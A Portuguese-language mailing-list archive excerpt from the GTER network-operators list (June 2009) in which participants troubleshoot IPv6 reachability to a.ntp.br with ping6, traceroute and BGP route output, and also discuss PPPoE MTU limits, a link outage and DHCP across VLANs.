12:10 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Epafras, > > Tem acesso v6 para a.dns.br ? > > % dig -6 @a.dns.br br soa > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > ... > ;; Query time: 17 msec > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > ;; WHEN: Fri Jun 19 12:13:28 2009 > ;; MSG SIZE rcvd: 330 > > Fred > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > >> Fala Edu, >> >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar >> > de > >> receber a rota... o traceroute para no PTT... veja... >> >> >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 >> >> >> {master} >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, >> > 12 > >> byte packets >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms >> 2 * * * >> 3 * * ^C >> {master} >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 >> >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 >> hidden) >> + = Active Route, - = Last Active, * = Both >> >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from >> > 2001:12f8::253 > >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 1w3d 14:50:11, localpref 160, from >> 2001:12f8::254 >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 >> AS path: 3549 22548 I >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 >> [BGP/170] 6w2d 20:04:43, localpref 100 >> AS path: 12956 27664 22548 I >> > to 2001:1498:1:a100:c1:6735:100:1 via >> > ge-0/2/0.4003 > >> {master} >> epafras at M10-SEMENTE-RE0> ping a.ntp.br >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 >> ^C >> --- a.ntp.br ping6 statistics --- >> 10 packets transmitted, 0 packets received, 100% packet loss >> >> {master} >> epafras at M10-SEMENTE-RE0> >> >> Grande Abra?o, >> >> Epafras >> CTBC >> >> >> >> >> >> >> Re: [GTER] a.ntp.br via ipv6 nao funciona >> >> Eduardo Ascen?o Reis >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 19/06/2009 11:25 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> Caro Alexandre, >> >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? >> nos >> ajudar nesse caso. >> >> 2009/6/19 Wilson Rogerio Lopes >> >> >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem >>> > conectividade > >> v6 >> >>> ao >>> servidor a.ntp.br >>> >>> $ ping6 a.ntp.br >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms >>> >>> >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que >> est? >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir >> > dele > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. >> >> Abra?os, >> >> -- >> >> Eduardo Ascen?o Reis >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br -- gter list https://eng.registro.br/mailman/listinfo/gter From juliano at cyberweb.com.br Fri Jun 19 14:06:09 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Fri, 19 Jun 2009 14:06:09 -0300 Subject: [GTER] a.ntp.br via ipv6 nao funciona In-Reply-To: References: Message-ID: <4A3BC581.7030007@cyberweb.com.br> Oi Epafras, A arquitetura do m10 ? parecida com m40? Quantos pps ele j? suportou na ctbc? Juliano epafras at ctbc.com.br escreveu: > Fred, > > a.dns.br OK. > > epafras at M10-SEMENTE-RE0> ping a.dns.br > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > ^C > --- a.dns.br ping6 statistics --- > 4 packets transmitted, 4 packets received, 0% packet loss > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > {master} > epafras at M10-SEMENTE-RE0> > > {master} > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > Trying 2001:12ff::10... > Connected to a.dns.br. > Escape character is '^]'. > ^C^] > telnet> quit > Connection closed. > > {master} > epafras at M10-SEMENTE-RE0> > > Abs. > > Epafras > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Frederico A C Neves > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 12:10 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Epafras, > > Tem acesso v6 para a.dns.br ? > > % dig -6 @a.dns.br br soa > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > ... > ;; Query time: 17 msec > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > ;; WHEN: Fri Jun 19 12:13:28 2009 > ;; MSG SIZE rcvd: 330 > > Fred > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > >> Fala Edu, >> >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar >> > de > >> receber a rota... o traceroute para no PTT... veja... >> >> >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 >> >> >> {master} >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, >> > 12 > >> byte packets >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms >> 2 * * * >> 3 * * ^C >> {master} >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 >> >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 >> hidden) >> + = Active Route, - = Last Active, * = Both >> >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from >> > 2001:12f8::253 > >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 1w3d 14:50:11, localpref 160, from >> 2001:12f8::254 >> AS path: 22548 I >> > to 2001:12f8::1 via ge-0/2/0.20 >> [BGP/170] 2d 10:08:00, MED 0, localpref 100 >> AS path: 3549 22548 I >> > to 2001:450:2002:cc::1 via ge-0/3/0.907 >> [BGP/170] 6w2d 20:04:43, localpref 100 >> AS path: 12956 27664 22548 I >> > to 2001:1498:1:a100:c1:6735:100:1 via >> > ge-0/2/0.4003 > >> {master} >> epafras at M10-SEMENTE-RE0> ping a.ntp.br >> PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 >> ^C >> --- a.ntp.br ping6 statistics --- >> 10 packets transmitted, 0 packets received, 100% packet loss >> >> {master} >> epafras at M10-SEMENTE-RE0> >> >> Grande Abra?o, >> >> Epafras >> CTBC >> >> >> >> >> >> >> Re: [GTER] a.ntp.br via ipv6 nao funciona >> >> Eduardo Ascen?o Reis >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 19/06/2009 11:25 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> Caro Alexandre, >> >> Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? >> nos >> ajudar nesse caso. >> >> 2009/6/19 Wilson Rogerio Lopes >> >> >>> Bem, antes de tudo, n?o custa ter certeza de que voc? tem >>> > conectividade > >> v6 >> >>> ao >>> servidor a.ntp.br >>> >>> $ ping6 a.ntp.br >>> PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 >>> 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms >>> 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms >>> >>> >> Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que >> est? >> fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir >> > dele > >> para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. >> >> Abra?os, >> >> -- >> >> Eduardo Ascen?o Reis >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From adelmojr at gmail.com Fri Jun 19 12:15:22 2009 From: adelmojr at gmail.com (Adelmo Junior) Date: Fri, 19 Jun 2009 12:15:22 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <20090617215546.GJ79676@registro.br> <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> <4201a710906180848g1059ab61nccdcd8251cf728df@mail.gmail.com> Message-ID: PPPoE ? 1472 2009/6/19 Giovane Heleno > Lulyis, > > Testei daqui at? os ips infomados no trace, e todos deram 1500 de MTU. > N?o est? ocorrendo com voc? por causa do PPPoE? > Acredito que em PPPoE, o MTU ? menor mesmo. > > Giovane Heleno > Wideway do Brasil Ltda. > www.wideway.com.br > > > > > 2009/6/18 Lulyis : > > Realizamos testes com mturoute partindo de uma conex?o speed business, ip > de > > origem 200.168.160.157, com destino ? rede da Diveo ip 200.202.116.106. > > Segue abaixo o resultado: > > > > C:\>mturoute 200.202.116.106 > > * ICMP Fragmentation is not permitted. * > > * Maximum payload is 10000 bytes. * > > - ICMP payload of 5046 bytes failed.. > > - ICMP payload of 2569 bytes failed.. > > + ICMP payload of 1330 bytes succeeded. > > - ICMP payload of 1949 bytes failed.. > > - ICMP payload of 1639 bytes failed.. > > - ICMP payload of 1484 bytes failed.. > > - ICMP payload of 1407 bytes failed.. > > - ICMP payload of 1368 bytes failed.. > > + ICMP payload of 1349 bytes succeeded. > > + ICMP payload of 1358 bytes succeeded. > > + ICMP payload of 1363 bytes succeeded. > > - ICMP payload of 1365 bytes failed.. > > + ICMP payload of 1364 bytes succeeded. > > + ICMP payload of 1364 bytes succeeded. > > Path MTU: 1392 bytes. > > > > C:\>mturoute -t 200.202.116.106 > > mturoute to 200.202.116.106, 30 hops max, variable sized packets > > * ICMP Fragmentation is not permitted. * > > * Maximum payload is 10000 bytes. * > > 1 --+-----+++-++ host: 200.168.160.129 max: 1392 bytes > > 2 ... (host 192.168.32.1 is not responding) > > 3 4 --+-----+++-++ host: 189.109.67.70 max: 1392 bytes > > 5 --+-----+++-++ host: 201.85.1.6 max: 1392 bytes > > 6 --+-----+++-++ host: 200.202.112.122 max: 1392 bytes > > 7 --+-----+++-++ host: 200.202.116.106 max: 1392 bytes > > > > > > Aparentemente a Telefonica est? limitando o MTU dos pacotes em 1364 > bytes. > > Algu?m da telefonica nesta lista que poderia verificar ou encaminhar > > internamente? Se poss?vel, nos retornem no telefone 15180*100. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rodrigo at rlima.org Fri Jun 19 14:08:32 2009 From: rodrigo at rlima.org (Rodrigo Lima) Date: Fri, 19 Jun 2009 14:08:32 -0300 (BRT) Subject: [GTER] Problemas NET Message-ID: <50156.189.98.91.218.1245431312.squirrel@webmail.rlima.org> Car?ssimos, Possu?mos um plano empresarial (DADOS/VOZ) por?m desde a madrugada o link de dados encontra-se literalmente OFF-LINE, previs?o de retorno segundo a NET era at? as 13:30, at? agora nada ! Algu?m mais est? com o mesmo problema, estamos em SP - CAPITAL, regi?o do Jabaquara. Forte abra?o, Rodrigo Lima From herlon at lcimt.com.br Fri Jun 19 14:09:44 2009 From: herlon at lcimt.com.br (Herlon Alcantara Matos) Date: Fri, 19 Jun 2009 13:09:44 -0400 Subject: [GTER] Problema com DHCP atrav?s de VLANs References: Message-ID: Francisco No meu entender a unica forma de voc? conseguir fazer isto, ? fazendo a autentica??o da VLAN do cliente atrav?s de autentica??o por MAC no switch e respectivamente recebendo desta forma o IP da faixa que deseja de DHCP. Acredito que as switchs Dell permitam tal servi?o, pois mesmo as switch mais xingiling novas da Cisco o fazem. Herlon LCI Telecom From jeansilva at mmcb.com.br Fri Jun 19 14:21:30 2009 From: jeansilva at mmcb.com.br (Jean Tomaz) Date: Fri, 19 Jun 2009 14:21:30 -0300 Subject: [GTER] RES: Problema com DHCP atrav?s de VLANs In-Reply-To: References: Message-ID: Francisco , seus switchs de acesso nao podem ter vlan porque ? Eh essencial que se fixe a vlan na porta no switch de acesso, porque quando a maquina faz um dhcp-request no campo "Giaddr" do cabecalho vai informacao da sub-rede que o mesmo ira pegar ip. Cada sub-rede eh um departamento? Atenciosamente, Jean Tomaz -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de gter-request at eng.registro.br Enviada em: sexta-feira, 19 de junho de 2009 13:54 Para: gter at eng.registro.br Assunto: gter Digest, Vol 75, Issue 70 Send gter mailing list submissions to gter at eng.registro.br To subscribe or unsubscribe via the World Wide Web, visit https://eng.registro.br/mailman/listinfo/gter or, via email, send a message with subject or body 'help' to gter-request at eng.registro.br You can reach the person managing the list at gter-owner at eng.registro.br When replying, please edit your Subject line so it is more specific than "Re: Contents of gter digest..." Today's Topics: 1. Problema com DHCP atrav?s de VLANs (Francisco Henrique) 2. Re: a.ntp.br via ipv6 nao funciona (Frederico A C Neves) 3. Re: a.ntp.br via ipv6 nao funciona (epafras at ctbc.com.br) 4. Re: a.ntp.br via ipv6 nao funciona (Alexandre J. Correa - Onda Internet) 5. Re: a.ntp.br via ipv6 nao funciona (epafras at ctbc.com.br) ---------------------------------------------------------------------- Message: 1 Date: Fri, 19 Jun 2009 11:08:47 -0300 From: Francisco Henrique Subject: [GTER] Problema com DHCP atrav?s de VLANs To: gter at eng.registro.br Message-ID: <138bd4780906190708x4c1eeac2o13a54ffb002ac1be at mail.gmail.com> Content-Type: text/plain; charset=ISO-8859-1 Senhores, estou com um problema onde eu trabalho, ? o seguinte: Tenho um servidor rodando o Astaro, onde em uma interface fisica TRUNK ligada a um switch Dell eu tenho duas interfaces VLANs, uma com ID 101 e outra com ID 201. Nesse mesmo switch chega uma fibra optica de um dos predios da institui??o, onde existem duas subredes: 192.168.1.0/24 e 192.168.2.0/24. Essa fibra optica ? conectada em outra interface TRUNK onde as VLANs 1, 101 e 201 s?o aceitas. Minha inten??o era que os PCs da rede 192.168.1.0 ficassem na VLAN 101 e os da 192.168.2.0 ficarem na 201. Mas no switch de acesso n?o existe e nem pode ter configura??o de VLAN, s? a porta TRUNK de uplink. No Astaro tem um cadastro de mapeamento de MACs, onde pra cada MAC existe um determinado IP. Existe um servidor DHCP para cada rede. Eis a pergunta: Existe algum jeito desse servi?o de DHCP dar certo? Quando um PC faz um request de DHCP, o pacote vai com a marca??o 1, que ? da VLAN default de todos os switches, na hora que isso bate no Astaro, h? alguma chance dele entregar o IP certo para o PC que fez o request? Est? confuso este cen?rio? Alguem pode me clarear a mente? ab?s -- ============= Francisco Henrique C. Ferreira francisco.henrique at gmail.com UIN: 5328093 Linux Registered User #368514 ------------------------------ Message: 2 Date: Fri, 19 Jun 2009 12:14:31 -0300 From: Frederico A C Neves Subject: Re: [GTER] a.ntp.br via ipv6 nao funciona To: Grupo de Trabalho de Engenharia e Operacao de Redes Message-ID: <20090619151431.GA81287 at registro.br> Content-Type: text/plain; charset=iso-8859-1 Epafras, Tem acesso v6 para a.dns.br ? % dig -6 @a.dns.br br soa ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa ... ;; Query time: 17 msec ;; SERVER: 2001:12ff::10#53(2001:12ff::10) ;; WHEN: Fri Jun 19 12:13:28 2009 ;; MSG SIZE rcvd: 330 Fred On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > Fala Edu, > > Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar de > receber a rota... o traceroute para no PTT... veja... > > > Meu IP de origem ? o da interface .... 2001:12f8::24/64 > > > {master} > epafras at M10-SEMENTE-RE0> traceroute a.ntp.br > traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, 12 > byte packets > 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms > 2 * * * > 3 * * ^C > {master} > epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 > > inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 > hidden) > + = Active Route, - = Last Active, * = Both > > 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 2001:12f8::253 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 1w3d 14:50:11, localpref 160, from > 2001:12f8::254 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 2d 10:08:00, MED 0, localpref 100 > AS path: 3549 22548 I > > to 2001:450:2002:cc::1 via ge-0/3/0.907 > [BGP/170] 6w2d 20:04:43, localpref 100 > AS path: 12956 27664 22548 I > > to 2001:1498:1:a100:c1:6735:100:1 via ge-0/2/0.4003 > > {master} > epafras at M10-SEMENTE-RE0> ping a.ntp.br > PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 > ^C > --- a.ntp.br ping6 statistics --- > 10 packets transmitted, 0 packets received, 100% packet loss > > {master} > epafras at M10-SEMENTE-RE0> > > Grande Abra?o, > > Epafras > CTBC > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Eduardo Ascen?o Reis > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 11:25 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Caro Alexandre, > > Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? > nos > ajudar nesse caso. > > 2009/6/19 Wilson Rogerio Lopes > > > > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade > v6 > > ao > > servidor a.ntp.br > > > > $ ping6 a.ntp.br > > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > > > > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que > est? > fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele > para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. > > Abra?os, > > -- > > Eduardo Ascen?o Reis > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter ------------------------------ Message: 3 Date: Fri, 19 Jun 2009 13:18:26 -0300 From: epafras at ctbc.com.br Subject: Re: [GTER] a.ntp.br via ipv6 nao funciona To: Grupo de Trabalho de Engenharia e Operacao de Redes Cc: Grupo de Trabalho de Engenharia e Operacao de Redes , gter-bounces at eng.registro.br Message-ID: Content-Type: text/plain; charset="ISO-8859-1" Fred, a.dns.br OK. epafras at M10-SEMENTE-RE0> ping a.dns.br PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms ^C --- a.dns.br ping6 statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms {master} epafras at M10-SEMENTE-RE0> {master} epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 Trying 2001:12ff::10... Connected to a.dns.br. Escape character is '^]'. ^C^] telnet> quit Connection closed. {master} epafras at M10-SEMENTE-RE0> Abs. Epafras Re: [GTER] a.ntp.br via ipv6 nao funciona Frederico A C Neves para: Grupo de Trabalho de Engenharia e Operacao de Redes 19/06/2009 12:10 Enviado por: gter-bounces at eng.registro.br Responda a Grupo de Trabalho de Engenharia e Operacao de Redes Epafras, Tem acesso v6 para a.dns.br ? % dig -6 @a.dns.br br soa ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa ... ;; Query time: 17 msec ;; SERVER: 2001:12ff::10#53(2001:12ff::10) ;; WHEN: Fri Jun 19 12:13:28 2009 ;; MSG SIZE rcvd: 330 Fred On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > Fala Edu, > > Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar de > receber a rota... o traceroute para no PTT... veja... > > > Meu IP de origem ? o da interface .... 2001:12f8::24/64 > > > {master} > epafras at M10-SEMENTE-RE0> traceroute a.ntp.br > traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, 12 > byte packets > 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms > 2 * * * > 3 * * ^C > {master} > epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 > > inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 > hidden) > + = Active Route, - = Last Active, * = Both > > 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 2001:12f8::253 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 1w3d 14:50:11, localpref 160, from > 2001:12f8::254 > AS path: 22548 I > > to 2001:12f8::1 via ge-0/2/0.20 > [BGP/170] 2d 10:08:00, MED 0, localpref 100 > AS path: 3549 22548 I > > to 2001:450:2002:cc::1 via ge-0/3/0.907 > [BGP/170] 6w2d 20:04:43, localpref 100 > AS path: 12956 27664 22548 I > > to 2001:1498:1:a100:c1:6735:100:1 via ge-0/2/0.4003 > > {master} > epafras at M10-SEMENTE-RE0> ping a.ntp.br > PING6(56=40+8+8 bytes) 2001:12f8::24 --> 2001:12ff::8 > ^C > --- a.ntp.br ping6 statistics --- > 10 packets transmitted, 0 packets received, 100% packet loss > > {master} > epafras at M10-SEMENTE-RE0> > > Grande Abra?o, > > Epafras > CTBC > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Eduardo Ascen?o Reis > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 11:25 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Caro Alexandre, > > Como bem colocado pelo Wilson, uma an?lise de conectividade IPv6 poder? > nos > ajudar nesse caso. > > 2009/6/19 Wilson Rogerio Lopes > > > > > Bem, antes de tudo, n?o custa ter certeza de que voc? tem conectividade > v6 > > ao > > servidor a.ntp.br > > > > $ ping6 a.ntp.br > > PING6(56=40+8+8 bytes) 2001:12ff:0:2::4 --> 2001:12ff::8 > > 16 bytes from 2001:12ff::8, icmp_seq=0 hlim=62 time=0.569 ms > > 16 bytes from 2001:12ff::8, icmp_seq=1 hlim=62 time=0.666 ms > > 16 bytes from 2001:12ff::8, icmp_seq=2 hlim=62 time=0.600 ms > > > > Por favor, informe (pela lista ou pvt) o endere?o IPv6 do seu host que > est? > fazendo os testes, e nos envie testes de ping6 e traceroute6 a partir dele > para o a.ntp.br. Depois iremos fazer os testes no sentido inverso. > > Abra?os, > > -- > > Eduardo Ascen?o Reis > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- gter list https://eng.registro.br/mailman/listinfo/gter ------------------------------ Message: 4 Date: Fri, 19 Jun 2009 13:40:45 -0300 From: "Alexandre J. Correa - Onda Internet" Subject: Re: [GTER] a.ntp.br via ipv6 nao funciona To: Grupo de Trabalho de Engenharia e Operacao de Redes Message-ID: <4A3BBF8D.3010106 at onda.psi.br> Content-Type: text/plain; charset=ISO-8859-1; format=flowed root at cube [/home/alexandre]# ping6 a.ntp.br PING a.ntp.br(a.ntp.br) 56 data bytes 64 bytes from a.ntp.br: icmp_seq=0 ttl=58 time=27.8 ms 64 bytes from a.ntp.br: icmp_seq=1 ttl=58 time=27.7 ms 64 bytes from a.ntp.br: icmp_seq=2 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=3 ttl=58 time=30.4 ms 64 bytes from a.ntp.br: icmp_seq=4 ttl=58 time=29.0 ms root at cube [/home/alexandre]# /usr/sbin/ntpdate -q -6 a.ntp.br server 2001:12ff::8, stratum 2, offset 0.071400, delay 0.04716 19 Jun 13:33:28 ntpdate[29780]: adjust time server 2001:12ff::8 offset 0.071400 sec root at cube [/home/alexandre]# /usr/sbin/ntpdate -6 a.ntp.br 19 Jun 13:33:38 ntpdate[29783]: no server suitable for synchronization found SQN-BRD-CTBC01#sh ipv6 route 2001:12ff:: IPv6 Routing Table - 1759 entries Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP U - Per-user Static route I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea, IS - ISIS summary O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2 ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2 B 2001:12FF::/32 [20/0] via 2001:1291:1601::A root at cube [/home/alexandre]# traceroute 2001:12ff::8 traceroute to 2001:12ff::8 (2001:12ff::8), 30 hops max, 40 byte packets 1 2001:12ac::1 (2001:12ac::1) 2.086 ms 2.904 ms 4.739 ms 2 2001:1291:1601::a (2001:1291:1601::a) 9.267 ms 9.252 ms 9.259 ms 3 2001:450:2002:cc::1 (2001:450:2002:cc::1) 19.506 ms 19.627 ms 19.681 ms 4 2001:450:2002:7f::2 (2001:450:2002:7f::2) 19.917 ms 19.651 ms 19.704 ms 5 ar01.bb1.registro.br (2001:12ff:2::228) 21.422 ms 21.550 ms 21.601 ms 6 2001:12ff:2:2::147 (2001:12ff:2:2::147) 19.691 ms 19.218 ms 19.081 ms 7 a.ntp.br (2001:12ff::8) 18.955 ms 19.144 ms 19.235 ms epafras at ctbc.com.br wrote: > Fred, > > a.dns.br OK. > > epafras at M10-SEMENTE-RE0> ping a.dns.br > PING6(56=40+8+8 bytes) 2001:450:2002:cc::2 --> 2001:12ff::10 > 16 bytes from 2001:12ff::10, icmp_seq=0 hlim=60 time=17.244 ms > 16 bytes from 2001:12ff::10, icmp_seq=1 hlim=60 time=16.986 ms > 16 bytes from 2001:12ff::10, icmp_seq=2 hlim=60 time=17.257 ms > 16 bytes from 2001:12ff::10, icmp_seq=3 hlim=60 time=17.206 ms > ^C > --- a.dns.br ping6 statistics --- > 4 packets transmitted, 4 packets received, 0% packet loss > round-trip min/avg/max/std-dev = 16.986/17.173/17.257/0.110 ms > > {master} > epafras at M10-SEMENTE-RE0> > > {master} > epafras at M10-SEMENTE-RE0> telnet a.dns.br port 53 > Trying 2001:12ff::10... > Connected to a.dns.br. > Escape character is '^]'. > ^C^] > telnet> quit > Connection closed. > > {master} > epafras at M10-SEMENTE-RE0> > > Abs. > > Epafras > > > > > > > Re: [GTER] a.ntp.br via ipv6 nao funciona > > Frederico A C Neves > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 19/06/2009 12:10 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > Epafras, > > Tem acesso v6 para a.dns.br ? > > % dig -6 @a.dns.br br soa > ; <<>> DiG 9.4.3-P1 <<>> -6 @a.dns.br br soa > ... > ;; Query time: 17 msec > ;; SERVER: 2001:12ff::10#53(2001:12ff::10) > ;; WHEN: Fri Jun 19 12:13:28 2009 > ;; MSG SIZE rcvd: 330 > > Fred > > On Fri, Jun 19, 2009 at 11:35:52AM -0300, epafras at ctbc.com.br wrote: > >> Fala Edu, >> >> Pra ajudar.... daqui eu n?o tenho conectividade com este IP... apesar >> > de > >> receber a rota... o traceroute para no PTT... veja... >> >> >> Meu IP de origem ? o da interface .... 2001:12f8::24/64 >> >> >> {master} >> epafras at M10-SEMENTE-RE0> traceroute a.ntp.br >> traceroute6 to a.ntp.br (2001:12ff::8) from 2001:12f8::24, 64 hops max, >> > 12 > >> byte packets >> 1 as22548.sp.ptt.br (2001:12f8::1) 20.039 ms 20.020 ms 19.946 ms >> 2 * * * >> 3 * * ^C >> {master} >> epafras at M10-SEMENTE-RE0> show route 2001:12ff::8 >> >> inet6.0: 1781 destinations, 3211 routes (1781 active, 0 holddown, 0 >> hidden) >> + = Active Route, - = Last Active, * = Both >> >> 2001:12ff::/32 *[BGP/170] 02:16:01, localpref 160, from 